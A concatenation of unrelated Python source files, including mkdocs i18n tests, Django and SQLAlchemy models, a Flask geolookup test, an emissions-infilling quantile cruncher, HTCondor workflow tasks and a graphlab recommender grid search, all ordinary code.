} def test_plugin_languages_backward_compat_13(): mkdocs_config = load_config( "tests/mkdocs_base.yml", theme={"name": "mkdocs"}, use_directory_urls=True, docs_dir="../docs/", site_url="http://localhost", extra_javascript=[], plugins={ "i18n": { "default_language": "en", "languages": { "default": { "name": "english_default", "site_name": "Default site name", }, "fr": {"name": "français", "site_name": "Site en Français"}, "en": { "name": "english", "build": True, "site_name": "English site name", }, }, } }, ) i18n_plugin = mkdocs_config["plugins"]["i18n"] i18n_plugin.on_config(mkdocs_config) assert i18n_plugin.default_language_options["site_name"] == "Default site name" assert i18n_plugin.config["languages"] == { "en": { "name": "english", "link": "./en/", "build": True, "site_name": "English site name", }, "fr": { "name": "français", "link": "./fr/", "build": True, "site_name": "Site en Français", }, } Pierre-Thibault/neo-insert-imports1-10 # ----------------------------------------------- # This file has only comments for testing purpose STATIC_IMPORT_MARK # ----------------------------------------------- import pytest import blog # Generated by Django 3.1.6 on 2021-04-02 09:09 from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Messages', fields=[ ('ipAddress', models.GenericIPAddressField(auto_created=True)), ('id', models.IntegerField(primary_key=True, 
serialize=False)), ('name', models.CharField(max_length=20, verbose_name='姓名')), ('content', models.CharField(max_length=5000, verbose_name='content')), ('createTime', models.DateTimeField(auto_now_add=True)), ], ), ] DrArtemi/riot-api from sqlalchemy.ext.declarative import declarative_base from sqlalchemy import create_engine, Column, Table, ForeignKey, MetaData from sqlalchemy.orm import relationship from sqlalchemy import ( Integer, String, Date, DateTime, Float, Boolean, Text) Base = declarative_base() player_team_association_table = Table('PlayerTeam', Base.metadata, Column('team_id', ForeignKey('teams.id'), primary_key=True), Column('player_id', ForeignKey('players.id'), primary_key=True) ) def create_table(engine): Base.metadata.create_all(engine) class Leagues(Base): __tablename__ = "leagues" id = Column(Integer, primary_key=True) riot_id = Column('riot_id', String(50), unique=True) slug = Column('slug', String(50), unique=True) name = Column('name', String(150)) region = Column('region', String(50)) image_url = Column('image_url', String(150)) priority = Column('priority', Integer) priority_position = Column('priority_position', Integer) priority_status = Column('priority_status', String(50)) class Tournaments(Base): __tablename__ = "tournaments" id = Column(Integer, primary_key=True) riot_id = Column('riot_id', String(50), unique=True) slug = Column('slug', String(50), unique=True) start_date = Column('start_date', DateTime) end_date = Column('end_date', DateTime) # League league_id = Column(Integer, ForeignKey('leagues.id'), nullable=False, index=True) league = relationship("Leagues", backref="tournaments") class Stages(Base): __tablename__ = "stages" id = Column(Integer, primary_key=True) slug = Column('slug', String(50)) name = Column('name', String(150)) type = Column('type', String(50)) # Tournament tournament_id = Column(Integer, ForeignKey('tournaments.id'), nullable=False, index=True) tournament = relationship("Tournaments", backref="stages") class Matches(Base): __tablename__ = "matches" id = Column(Integer, primary_key=True) riot_id = Column('riot_id', String(50), unique=True) date = Column('date', DateTime) state = Column('state', String(50)) final_state = Column('final_state', String()) evolution = Column('evolution', String()) # Tournament stage_id = Column(Integer, ForeignKey('stages.id'), nullable=False, index=True) stage = relationship("Stages", backref="matches") # teams team_1_id = Column(Integer, ForeignKey('teams.id'), nullable=True, index=True) team_2_id = Column(Integer, ForeignKey('teams.id'), nullable=True, index=True) team_1 = relationship("Teams", foreign_keys=[team_1_id]) team_2 = relationship("Teams", foreign_keys=[team_2_id]) team_1_win = Column(Boolean) team_2_win = Column(Boolean) class Teams(Base): __tablename__ = "teams" id = Column(Integer, primary_key=True) riot_id = Column('riot_id', String(50), unique=True) slug = Column('slug', String(50)) code = Column('code', String(50)) name = Column('name', String(150)) image = Column('image', String(150)) alt_image = Column('alt_image', String(150)) bg_image = Column('bg_image', String(150)) status = Column('status', String(50)) # League league_id = Column(Integer, ForeignKey('leagues.id'), nullable=True, index=True) league = relationship("Leagues", backref="teams") class Players(Base): __tablename__ = "players" id = Column(Integer, primary_key=True) riot_id = Column('riot_id', String(50), unique=True) summoner_name = Column('summoner_name', String(50)) first_name = Column('first_name', String(50)) 
last_name = Column('last_name', String(50)) image = Column('image', String(150)) role = Column('role', String(50)) # Current team current_team_id = Column(Integer, ForeignKey('teams.id'), nullable=False, index=True) current_team = relationship("Teams", backref="current_players") # Teams teams = relationship("Teams", secondary=player_team_association_table, backref='players')N = int(input()) N %= 30 S = list('123456') for i in range(N): S[i%5], S[i%5+1] = S[i%5+1], S[i%5] print(''.join(S)) def binary_search(list, key): begin = 0 #assigning initial values end = len(list) while begin < end: mid = (begin + end)//2 if list[mid] > key: end = mid elif list[mid] < key: begin = mid + 1 else: return mid return -1 list = input('Enter the list of numbers(SORTED): ') list = list.split() list = [int(x) for x in list] key = int(input('Enter number to search: ')) #value to search index = binary_search(list, key) if index < 0: print('{} was not found.'.format(key)) else: print('{} was found at index {}.'.format(key, index)) cityofcapetown/cape-good-of-place-names # coding: utf-8 from __future__ import absolute_import import base64 import tempfile from flask import json, current_app from six import BytesIO from cape_of_good_place_names import util from cape_of_good_place_names.models.error import Error # noqa: E501 from cape_of_good_place_names.models.geolookup_results import GeolookupResults # noqa: E501 from cape_of_good_place_names.test import BaseTestCase class GeoLookupTestConfig(object): TIMEZONE = "Africa/Johannesburg" USER_SECRETS_FILE = "" USER_SECRETS_SALT_KEY = "" GEOCODERS = [] GEOCODERS_MIN = 0 SCRUBBERS = [] SCRUBBERS_MIN = 0 class TestGeoLookupController(BaseTestCase): """DefaultController integration test stubs""" def setUp(self) -> None: credentials = base64.b64encode(b"test_user:_password").decode('utf-8') self.authorisation_headers = {"Authorization": "Basic {}".format(credentials)} # Setting up the GeoLookup data files tc = GeoLookupTestConfig() self.temp_dir = tempfile.TemporaryDirectory() tc.GEOLOOKUP_DATASET_DIR = self.temp_dir.name temp_geojson = { "type": "FeatureCollection", "features": [{ "type": "Feature", "geometry": { "type": "Point", "coordinates": [0.0, 0.0] }, "properties": { "temp_id": "centre_of_the_world" }}] } temp_layer_file_path = self.temp_dir.name + "temp_layer.geojson" with open(temp_layer_file_path, "w") as temp_layer_file: json.dump(temp_geojson, temp_layer_file) tc.GEOLOOKUP_DATASET_CONFIG = { "temp_layer": (temp_layer_file.name, "temp_id") } current_app.config.from_object(tc) util.flush_caches() def tearDown(self) -> None: self.temp_dir.cleanup() def test_geolookup(self): """Vanilla test case for geolookup of specific ID Translate a spatial identifier into a description of space """ # Looking up a specific ID query_string = [('spatial_id', 'centre_of_the_world'), ('spatial_dataset_id', 'temp_layer')] response = self.client.open( '/v1/boundary_lookup', method='GET', query_string=query_string, headers=self.authorisation_headers ) self.assert200(response, 'Response body is : ' + response.data.decode('utf-8')) # Asserting that we get back the results we expect data_dict = json.loads(response.data) self.assertIn("results", data_dict) results = data_dict["results"] self.assertEqual(len(data_dict["results"]), 1, "Boundary Lookup is not returning the expected number of test results") # Inspecting the result itself result, *_ = results self.assertEqual(result["geolookup_id"], "centre_of_the_world", "Spatial ID not mapped through correctly") result_dict = 
json.loads(result["geolookup_value"]) self.assertEqual( result_dict, {"features": [ {"geometry": {"coordinates": [0.0, 0.0], "type": "Point"}, "properties": {"temp_id": "centre_of_the_world"}, "type": "Feature"}], "type": "FeatureCollection"}, "Geolookedup value not mapped through correctly" ) def test_geolookup_dataset(self): """Vanilla test case for geolookup of whole dataset Translate a spatial identifier into a description of space """ # Looking up a specific ID query_string = [('spatial_dataset_id', 'temp_layer')] response = self.client.open( '/v1/boundary_lookup', method='GET', query_string=query_string, headers=self.authorisation_headers ) self.assert200(response, 'Response body is : ' + response.data.decode('utf-8')) # Asserting that we get back the results we expect data_dict = json.loads(response.data) self.assertIn("results", data_dict) results = data_dict["results"] self.assertEqual(len(data_dict["results"]), 1, "Boundary Lookup is not returning the expected number of test results") # Inspecting the result itself result, *_ = results self.assertEqual(result["geolookup_id"], "temp_layer", "Spatial Dataset ID not mapped through correctly") result_dict = json.loads(result["geolookup_value"]) self.assertEqual( result_dict, {"features": [ {"geometry": {"coordinates": [0.0, 0.0], "type": "Point"}, "properties": {"temp_id": "centre_of_the_world"}, "type": "Feature"}], "type": "FeatureCollection"}, "Geolookedup value not mapped through correctly" ) if __name__ == '__main__': import unittest unittest.main() import unittest from unittest.mock import patch from tmc import points from tmc.utils import load, load_module, reload_module, get_stdout, check_source from functools import reduce import os import textwrap exercise = 'src.integers_to_strings' function = 'formatted' def get_correct(test_case: list) -> list: return [f"{x:.2f}" for x in test_case] @points('4.integers_to_strings') class IntegersToStringsTest(unittest.TestCase): @classmethod def setUpClass(cls): with patch('builtins.input', side_effect=[AssertionError("Asking input from the user was not expected")]): cls.module = load_module(exercise, 'en') def test_0_main_program_ok(self): ok, line = check_source(self.module) message = """The code for testing the functions should be placed inside if __name__ == "__main__": block. 
The following row should be moved: """ self.assertTrue(ok, message+line) def test_1_function_exists(self): try: from src.integers_to_strings import formatted formatted([0.23]) except: self.assertTrue(False, 'Your code should contain function named as formatted(my_list: list)') try: formatted = load(exercise, function, 'en') formatted([0.23]) except: self.assertTrue(False, 'Make sure, that function can be called as follows formatted([0.23])') def test_2_type_of_return_value(self): formatted = load(exercise, function, 'en') val = formatted([1.23]) self.assertTrue(type(val) == list, "Function formatted does not return list with parameter value [1.23].") if __name__ == '__main__': unittest.main()amih90/bacpypes #!/usr/bin/env python # -*- coding: utf-8 -*- """ Test Choice ----------- """ import unittest from bacpypes.basetypes import Scale from bacpypes.debugging import bacpypes_debugging, ModuleLogger from bacpypes.primitivedata import Tag, TagList # some debugging _debug = 0 _log = ModuleLogger(globals()) @bacpypes_debugging class TestScaleChoice(unittest.TestCase): def test_scale_choice(self): if _debug: TestScaleChoice._debug("test_scale_choice") taglist = TagList([Tag(1, 1, 1, bytearray(b'\x00'))]) scale = Scale() scale.decode(taglist) self.assertDictEqual(scale.dict_contents(), {'integerScale': 0}) """ Module for the database cruncher which uses the 'rolling windows' technique. """ import logging import numpy as np import scipy.interpolate from pyam import IamDataFrame from ..stats import rolling_window_find_quantiles from ..utils import _get_unit_of_variable from .base import _DatabaseCruncher logger = logging.getLogger(__name__) class QuantileRollingWindows(_DatabaseCruncher): """ Database cruncher which uses the 'rolling windows' technique. This cruncher derives the relationship between two variables by performing quantile calculations between the follower timeseries and the lead timeseries. These calculations are performed at each timestep in the timeseries, independent of the other timesteps. For each timestep, the lead timeseries axis is divided into multiple evenly spaced windows (to date this is only tested on 1:1 relationships but may work with more than one lead timeseries). In each window, every data point in the database is included. However, the data points receive a weight given by .. math:: w(x, x_{\\text{window}}) = \\frac{1}{1 + (d_n)^2} where :math:`w` is the weight and :math:`d_n` is the normalised distance between the centre of the window and the data point's position on the lead timeseries axis. :math:`d_n` is calculated as .. math:: d_n = \\frac{x - x_{\\text{window}}}{f \\times (\\frac{b}{2})} where :math:`x` is the position of the data point on the lead timeseries axis, :math:`x_{\\text{window}}` is the position of the centre of the window on the lead timeseries axis, :math:`b` is the distance between window centres and :math:`f` is a decay factor which controls how much less points away from :math:`x_{\\text{window}}` are weighted. If :math:`f=1` then a point which is half the width between window centres away receives a weighting of :math:`1/2`. Lowering the value of :math:`f` cause points further from the window centre to receive less weight. With these weightings, the desired quantile of the data is then calculated. This calculation is done by sorting the data by the database's follow timeseries values (then by lead timeseries values in the case of identical follow values). From here, the weight of each point is calculated following the formula given above. 
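As a concrete illustration of the weighting above, using only the stated formula with :math:`f = 1`: a data point sitting exactly at a window centre has :math:`d_n = 0` and weight :math:`w = 1`; a point half a window spacing away has :math:`d_n = 1` and :math:`w = 1/2` (as noted above); and a point a full window spacing away has

    .. math::
        d_n = \\frac{b}{1 \\times (b / 2)} = 2, \\qquad w = \\frac{1}{1 + 2^2} = \\frac{1}{5}.

    So the weights fall off smoothly but never reach zero, which is why every data point in the database still contributes to every window.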
We calculate the cumulative sum of weights, and then the cumulative sum up to half weights, defined by .. math:: c_{hw} = c_w - 0.5 \\times w where :math:`c_w` is the cumulative weights and :math:`w` is the raw weights. This ensures that quantiles less than half the weight of the smallest follow value return the smallest follow value and more than one minus half the weight of the largest follow value return the largest value. Without such a shift, the largest value is only returned if the quantile is 1, leading to a bias towards smaller values. With these calculations, we have determined the relationship between the follow timeseries values and the quantile i.e. cumulative sum of (normalised) weights. We can then determine arbitrary quantiles by linearly interpolating. If the option ``use_ratio`` is set to ``True``, instead of returning the absolute value of the follow at this quantile, we return the quantile of the ratio between the lead and follow data in the database, multiplied by the actual lead value of the database being infilled. By varying the quantile, this cruncher can provide ranges of the relationship between different variables. For example, it can provide the 90th percentile (i.e. high end) of the relationship between e.g. ``Emissions|CH4`` and ``Emissions|CO2`` or the 50th percentile (i.e. median) or any other arbitrary percentile/quantile choice. Note that the impact of this will strongly depend on nwindows and decay_length_factor. Using the :class:`TimeDepQuantileRollingWindows` class makes it is possible to specify a dictionary of dates to quantiles, in which case we return that quantile for that year or date. """ def derive_relationship( self, variable_follower, variable_leaders, quantile=0.5, nwindows=11, decay_length_factor=1, use_ratio=False, ): """ Derive the relationship between two variables from the database. Parameters ---------- variable_follower : str The variable for which we want to calculate timeseries (e.g. ``"Emissions|CH4"``). variable_leaders : list[str] The variable(s) we want to use in order to infer timeseries of ``variable_follower`` (e.g. ``["Emissions|CO2"]``). quantile : float The quantile to return in each window. nwindows : int The number of window centers to use when calculating the relationship between the follower and lead gases. decay_length_factor : float Parameter which controls how strongly points away from the window's centre should be weighted compared to points at the centre. Larger values give points further away increasingly less weight, smaller values give points further away increasingly more weight. use_ratio : bool If false, we use the quantile value of the weighted mean absolute value. If true, we find the quantile weighted mean ratio between lead and follow, then multiply the ratio by the input value. Returns ------- :obj:`func` Function which takes a :obj:`pyam.IamDataFrame` containing ``variable_leaders`` timeseries and returns timeseries for ``variable_follower`` based on the derived relationship between the two. Please see the source code for the exact definition (and docstring) of the returned function. Raises ------ ValueError There is no data for ``variable_leaders`` or ``variable_follower`` in the database. ValueError ``quantile`` is not between 0 and 1. ValueError ``nwindows`` is not equivalent to an integer or is not greater than 1. ValueError ``decay_length_factor`` is 0. 
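Examples
        --------
        A minimal usage sketch, for orientation only: ``database`` and
        ``scenarios_to_infill`` are assumed placeholder :obj:`pyam.IamDataFrame`
        objects, and constructing the cruncher directly from the database is an
        assumption here (the constructor is not shown in this module)::

            cruncher = QuantileRollingWindows(database)
            filler = cruncher.derive_relationship(
                variable_follower="Emissions|CH4",
                variable_leaders=["Emissions|CO2"],
                quantile=0.9,
            )
            # returns an IamDataFrame holding the infilled Emissions|CH4 timeseries
            infilled = filler(scenarios_to_infill)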
""" self._check_follower_and_leader_in_db(variable_follower, variable_leaders) if not (0 <= quantile <= 1): error_msg = "Invalid quantile ({}), it must be in [0, 1]".format(quantile) raise ValueError(error_msg) if int(nwindows) != nwindows or nwindows < 2: error_msg = "Invalid nwindows ({}), it must be an integer > 1".format( nwindows ) raise ValueError(error_msg) nwindows = int(nwindows) if np.equal(decay_length_factor, 0): raise ValueError("decay_length_factor must not be zero") data_leader_unit = _get_unit_of_variable(self._db, variable_leaders)[0] data_follower_unit = _get_unit_of_variable(self._db, variable_follower)[0] db_time_col = self._db.time_col columns = "variable" idx = list(set(self._db.data.columns) - {columns, "value", "unit"}) wide_db = self._db.filter( variable=[variable_follower] + variable_leaders ).pivot_table(index=idx, columns=columns, aggfunc="sum") # make sure we don't have empty strings floating around (pyam bug?) wide_db = wide_db.applymap(lambda x: np.nan if isinstance(x, str) else x) wide_db = wide_db.dropna(axis=0) derived_relationships = {} for db_time, dbtdf in wide_db.groupby(db_time_col): xs = dbtdf[variable_leaders].values.squeeze() ys = dbtdf[variable_follower].values.squeeze() if xs.shape != ys.shape: raise NotImplementedError( "Having more than one `variable_leaders` is not yet implemented" ) if not xs.shape: # 0D-array, make 1D xs = np.array([xs]) ys = np.array([ys]) if use_ratio: # We want the ratio between x and y, not the actual values of y. ys = ys / xs if np.isnan(ys).any(): logger.warning( "Undefined values of ratio appear in the quantiles when " "infilling {}, setting some values to 0 (this may not affect " "results).".format(variable_follower) ) ys[np.isnan(ys)] = 0 if np.equal(max(xs), min(xs)): # We must prevent singularity behaviour if all the points are at the # same x value. cumsum_weights = np.array([(0.5 + x) / len(ys) for x in range(len(ys))]) ys.sort() def same_x_val_workaround( _, ys=ys, cumsum_weights=cumsum_weights, quantile=quantile ): if np.equal(min(ys), max(ys)): return ys[0] return scipy.interpolate.interp1d( cumsum_weights, ys, bounds_error=False, fill_value=(ys[0], ys[-1]), assume_sorted=True, )(quantile) derived_relationships[db_time] = same_x_val_workaround else: db_time_table = rolling_window_find_quantiles( xs, ys, quantile, nwindows, decay_length_factor ) derived_relationships[db_time] = scipy.interpolate.interp1d( db_time_table.index.values, db_time_table.loc[:, quantile].values.squeeze(), bounds_error=False, fill_value=( db_time_table[quantile].iloc[0], db_time_table[quantile].iloc[-1], ), ) def filler(in_iamdf): """ Filler function derived from :class:`QuantileRollingWindows`. Parameters ---------- in_iamdf : :obj:`pyam.IamDataFrame` Input data to fill data in Returns ------- :obj:`pyam.IamDataFrame` Filled in data (without original source data) Raises ------ ValueError The key db_times for filling are not in ``in_iamdf``. 
""" if db_time_col != in_iamdf.time_col: raise ValueError( "`in_iamdf` time column must be the same as the time column used " "to generate this filler function (`{}`)".format(db_time_col) ) var_units = _get_unit_of_variable(in_iamdf, variable_leaders) if var_units.size == 0: raise ValueError( "There is no data for {} so it cannot be infilled".format( variable_leaders ) ) var_units = var_units[0] if var_units != data_leader_unit: raise ValueError( "Units of lead variable is meant to be `{}`, found `{}`".format( data_leader_unit, var_units ) ) # check whether we have all the required timepoints or not have_all_timepoints = all( [c in derived_relationships for c in in_iamdf.timeseries()] ) if not have_all_timepoints: raise ValueError( "Not all required timepoints are present in the database we " "crunched, we crunched \n\t`{}`\nbut you passed in \n\t{}".format( list(derived_relationships.keys()), in_iamdf.timeseries().columns.tolist(), ) ) # do infilling here infilled_ts = in_iamdf.filter(variable=variable_leaders).timeseries() if use_ratio and (infilled_ts.values < 0).any(): warn_str = "Note that the lead variable {} goes negative.".format( variable_leaders ) logger.warning(warn_str) print(warn_str) for col in infilled_ts: if use_ratio: infilled_ts[col] = ( derived_relationships[col](infilled_ts[col]) * infilled_ts[col] ) else: infilled_ts[col] = derived_relationships[col](infilled_ts[col]) infilled_ts = infilled_ts.reset_index() infilled_ts["variable"] = variable_follower infilled_ts["unit"] = data_follower_unit return IamDataFrame(infilled_ts) return filler # coding: utf-8 # """ # Simple law tasks that demonstrate how use remote file targets and how to run on remote resources using HTCondor. # """ import os import luigi import law from shutil import rmtree from framework import Task, HTCondorWorkflow from tempfile import mkdtemp # law.contrib.load("tasks") # to have the RunOnceTask #Task runs over HTCondor class CreateTrainingDatasets(HTCondorWorkflow, law.LocalWorkflow): era = luigi.Parameter(description="Run era") channel = luigi.Parameter(description="Decay Channel") mass = luigi.Parameter(description="Mass hypothesis of heavy NMSSM Higgs boson.") batch_num = luigi.Parameter(description="Group of mass hypotheses of light NMSSM Higgs boson.") files_template = [ "{prefix}fold0_training_dataset.root", "{prefix}fold1_training_dataset.root", "{prefix}dataset_config.yaml", ] def create_branch_map(self): if self.era == "all_eras": eras = ["2016", "2017", "2018"] else: eras = [self.era] return [{"era": era, "channel": self.channel, "mass": self.mass, "batch": self.batch_num} for era in eras] def output(self): # Define output files: fold 0 and 1 of training data + config file prefix = "training_dataset_{era}_{channel}_{mass}_{batch}/".format( era=self.branch_data["era"], channel=self.channel, mass=self.mass, batch=self.batch_num ) files = [file_string.format(prefix=prefix) for file_string in self.files_template] targets = self.remote_targets(files) for target in targets: target.parent.touch() return targets def run(self): # Create training datasets self.run_command( command=[ "ml/create_training_dataset.sh", self.branch_data["era"], self.channel, self.mass, self.batch_num ], run_location="sm-htt-analysis" ) # Copy resulting files to remote storage prefix = "sm-htt-analysis/output/ml/{era}_{channel}_{mass}_{batch}/".format( era=self.branch_data["era"], channel=self.channel, mass=self.mass, batch=self.batch_num ) self.run_command( command=["ls", "-R"], run_location=prefix ) files = 
[file_string.format(prefix=prefix) for file_string in self.files_template] for file_remote, file_local in zip(self.output(), files): file_remote.copy_from_local(file_local) # Task runs local class CreateTrainingDatasetsAllEras(Task): era = luigi.Parameter(description="Run era") channel = luigi.Parameter(description="Decay Channel") mass = luigi.Parameter(description="Mass hypothesis of heavy NMSSM Higgs boson.") batch_num = luigi.Parameter(description="Group of mass hypotheses of light NMSSM Higgs boson.") # Requirements dependant on whether all_eras was used def requires(self): if self.era!="all_eras": raise Exception( "CreateTrainingDatasetsAllEras task is intended for all_eras, but {} was given.".format( self.era ) ) requirements_args = { "era": self.era, "channel": self.channel, "mass": self.mass, "batch_num": self.batch_num } return CreateTrainingDatasets(**requirements_args) def output(self): # Require combined config file prefix = "training_dataset_all_eras_{channel}_{mass}_{batch}/".format( channel=self.channel, mass=self.mass, batch=self.batch_num ) files = "{prefix}dataset_config.yaml".format(prefix=prefix) target = self.remote_target(files) target.parent.touch() return target def run(self): cmb_tag = "{channel}_{mass}_{batch}".format( channel=self.channel, mass=self.mass, batch=self.batch_num ) # If all_eras: if self.era == "all_eras": temporary_dir = mkdtemp(dir="/tmp/{user}".format(user=self.user_name)) # Fetch config files of all eras to local for i, era in enumerate(["2016", "2017", "2018"]): prefix_ = "{tmpdir}/{era}_{cmb_tag}/".format(tmpdir=temporary_dir, era=era, cmb_tag=cmb_tag) era_conf_file = self.input()["collection"][i][2] #dataset_config.yaml era_conf_file.copy_to_local("{prefix}dataset_config.yaml".format(prefix=prefix_)) # Combine configs command = ["ml/combine_configs.sh", self.channel, self.mass, self.batch_num, temporary_dir ] self.run_command(command=command, run_location="sm-htt-analysis") prefix = "{tmpdir}/all_eras_{cmb_tag}/".format(tmpdir=temporary_dir, cmb_tag=cmb_tag) # Send combined configs to remote self.output().touch() self.output().copy_from_local("{prefix}dataset_config.yaml".format(prefix=prefix))phiratio/lpthw10-100 class AverageList(list): @property def average(self): return sum(self) / len(self) import os from .core.internationalization import * from .core.applist import * from .core.json_settings import get_settings from .core.staticfiles import * from .core.mediafiles import * from .core.mailserver import * settings = get_settings() BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) SECRET_KEY = settings['SECRET_KEY'] DEBUG = settings['DEBUG'] ALLOWED_HOSTS = settings['SECURITY']['ALLOWED_HOSTS'] DATABASES = settings['DB'] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'djflow.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [os.path.join(BASE_DIR, 'djflow/templates')], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] 
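# Illustrative aside, not part of this project: judging only from the keys read in
# this settings module (SECRET_KEY, DEBUG, SECURITY['ALLOWED_HOSTS'], DB and, just
# below, AUTH_PASSWORD_VALIDATORS), the structure returned by get_settings()
# plausibly has the shape sketched here. Every value is an invented placeholder.
_EXAMPLE_SETTINGS_SHAPE = {
    "SECRET_KEY": "<random-secret-key>",
    "DEBUG": False,
    "SECURITY": {"ALLOWED_HOSTS": ["localhost", "127.0.0.1"]},
    "DB": {"default": {"ENGINE": "django.db.backends.sqlite3", "NAME": "db.sqlite3"}},
    "AUTH_PASSWORD_VALIDATORS": [],
}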
WSGI_APPLICATION = 'djflow.wsgi.application' AUTH_PASSWORD_VALIDATORS = settings['AUTH_PASSWORD_VALIDATORS'] LOGIN_URL = '/security/login/' 0 import graphlab as gl from . import data_preprocess as dp from graphlab.toolkits.cross_validation import KFold from graphlab.toolkits.model_parameter_search import grid_search from . import nlp_funcs as nl from collections import Counter import pandas as pd from . import scrape_leafly as sl import matplotlib.pyplot as plt def basic_fr(train, test): ''' trains a default factorization_recommender on a train set and scores on test set args: train and test dataframes returns: graphlab recommendation engine ''' test_og = test.copy() ratings = gl.SFrame(train) testsl = gl.SFrame(test) rec_engine = gl.factorization_recommender.create(observation_data=ratings, user_id="user", item_id="product", target='rating', solver='auto', num_factors=32 # 32 by default ) test.rating = rec_engine.predict(testsl) test.to_csv('test_predictions.csv', index=False, encoding='utf-8') print('raw mse score:', dp.score_model_mse(test_og.rating, test.rating)) return rec_engine def gridsearch_big_step(df): ''' gridsearches num_factors for the factorization_recommender in larger steps args: dataframe, df returns: gridsearch object ''' data = gl.SFrame(df) kfolds = KFold(data, 3) params = dict([('user_id', 'user'), ('item_id', 'product'), ('target', 'rating'), ('solver', 'auto'), ('num_factors', [2, 3, 4, 5, 6, 10, 20, 32])]) grid = grid_search.create( kfolds, gl.factorization_recommender.create, params) grid.get_results() return grid # results: ''' +---------+-------------+--------+--------+---------+--------------+ | item_id | num_factors | solver | target | user_id | model_id | +---------+-------------+--------+--------+---------+--------------+ | product | 6 | auto | rating | user | [13, 12, 14] | | product | 2 | auto | rating | user | [1, 0, 2] | | product | 3 | auto | rating | user | [3, 5, 4] | | product | 4 | auto | rating | user | [8, 7, 6] | | product | 20 | auto | rating | user | [19, 18, 20] | | product | 32 | auto | rating | user | [21, 23, 22] | | product | 5 | auto | rating | user | [9, 11, 10] | | product | 10 | auto | rating | user | [15, 17, 16] | +---------+-------------+--------+--------+---------+--------------+ +----------------------+--------------------+------------------------+ | mean_validation_rmse | mean_training_rmse | mean_training_recall@5 | +----------------------+--------------------+------------------------+ | 1.00678522065 | 0.323030678029 | 0.000154761649416 | | 1.0208240936 | 0.453632730191 | 0.000122923478199 | | 1.00833928422 | 0.399805022552 | 0.000122507107597 | | 1.00770345896 | 0.362172915738 | 0.000107193018127 | | 0.983536655638 | 0.242915200506 | 0.00432907413023 | | 0.983353577078 | 0.24082851848 | 0.00435477863392 | | 1.00653732816 | 0.344224040089 | 0.000194937374462 | | 0.986200185618 | 0.272243232275 | 0.00193547952321 | +----------------------+--------------------+------------------------+ +--------------------------+-----------+-----------------------------+-----------+ | mean_validation_recall@5 | fold_id | mean_validation_precision@5 | num_folds | +--------------------------+-----------+-----------------------------+-----------+ | 2.22170382466e-06 | [1, 0, 2] | 2.22170382466e-06 | 3 | | 0.0 | [1, 0, 2] | 0.0 | 3 | | 0.0 | [0, 2, 1] | 0.0 | 3 | | 0.0 | [2, 1, 0] | 0.0 | 3 | | 2.55287233685e-05 | [1, 0, 2] | 5.10991879673e-05 | 3 | | 3.18371310973e-05 | [0, 2, 1] | 3.77689650193e-05 | 3 | | 0.0 | [0, 2, 1] | 0.0 | 3 | | 
1.58848655361e-05 | [0, 2, 1] | 1.55519267726e-05 | 3 | +--------------------------+-----------+-----------------------------+-----------+ +---------------------------+ | mean_training_precision@5 | +---------------------------+ | 0.000139302381458 | | 0.0001082603732 | | 0.000133943316761 | | 0.000108451292331 | | 0.00392953856325 | | 0.00397506409151 | | 0.0001511569914 | | 0.00165102804133 | +---------------------------+ ''' ''' looks like 20 features is a decent number. need to gridsearch more later in the range 10-30 ''' def gridsearch_alot(df): ''' gridsearches num_factors for the factorization_recommender in range 2-32 args: dataframe, df returns: gridsearch object ''' data = gl.SFrame(df) kfolds = KFold(data, 3) num_factors_space = list(range(20, 31)) num_factors_space.extend([2, 4, 6, 8, 10, 12, 16, 32]) num_factors_space = sorted(num_factors_space) params = dict([('user_id', 'user'), ('item_id', 'product'), ('target', 'rating'), ('solver', 'auto'), ('num_factors', num_factors_space)]) grid = grid_search.create( kfolds, gl.factorization_recommender.create, params) grid.get_results() return grid if __name__ == "__main__": df = dp.load_data() df.drop(['date', 'time', 'review'], axis=1, inplace=True) df2 = dp.get_users_more_than_2_reviews(df) # # drop everything but user, product, rating grid2 = gridsearch_alot(df2) res2 = grid2.get_results() grid2.save('gridsearch_gt2_reviews.sframe') res2df = res2.to_dataframe() # converts to pandas dataframe res2df = res2df.sort_values(by='num_factors') res2df.to_csv('res2df.csv') res2df.plot(x='num_factors', y='mean_validation_rmse') plt.show() res2df.plot(x='num_factors', y='mean_training_rmse') plt.show() res2df.plot(x='num_factors', y='mean_training_recall@5') plt.show() res2df.plot(x='num_factors', y='mean_validation_recall@5') plt.show() res2df.plot(x='num_factors', y='mean_validation_precision@5') plt.show() res2df.plot(x='num_factors', y='mean_training_precision@5') plt.show() # looks like at about 10 factors, things flatten out # print grid.get_results() # remove user 'Anonymous' -- necessary to match up size of products from # data_preprocess get users and products func # basic rec engine first try #train, test = dp.make_tt_split(df) # trains and scores a basic factorization_recommender #basic_fr(train, test) # gridsearches over larger steps # gridsearch_big_step(df) # fit a model to the full review set to get latent feature groups # data = gl.SFrame(df) # num_factors = 20 # rec_engine = gl.factorization_recommender.create(observation_data=data, # user_id="user", # item_id="product", # target='rating', # solver='auto', # num_factors=num_factors # ) # # # assign groups to users and products based on highest coefficient in the matrices # d = rec_engine.get("coefficients") # U1 = d['user'] # U2 = d['product'] # U1 = U1['factors'].to_numpy() # U2 = U2['factors'].to_numpy() # # user_groups = U1.argmax(axis=1) # prod_groups = U2.argmax(axis=1) # # users, products = dp.get_users_and_products(df) # # full_df = dp.load_data() # prod_group_dict = {} # prod_group_dfs = {} # for i in range(num_factors): # # this gets the product names in each group # prod_list = products[prod_groups == i].index # prod_group_dict[i] = prod_list # prod_list = set(prod_list) # # this will get dataframes from the main df with products in each group # prod_group_dfs[i] = full_df[full_df['product'].isin(prod_list)] # # top_words = {} # top_words_set = set() # word_list = [] # for i in range(num_factors): # words = nl.get_top_words(prod_group_dfs[i]) # top_words_set = 
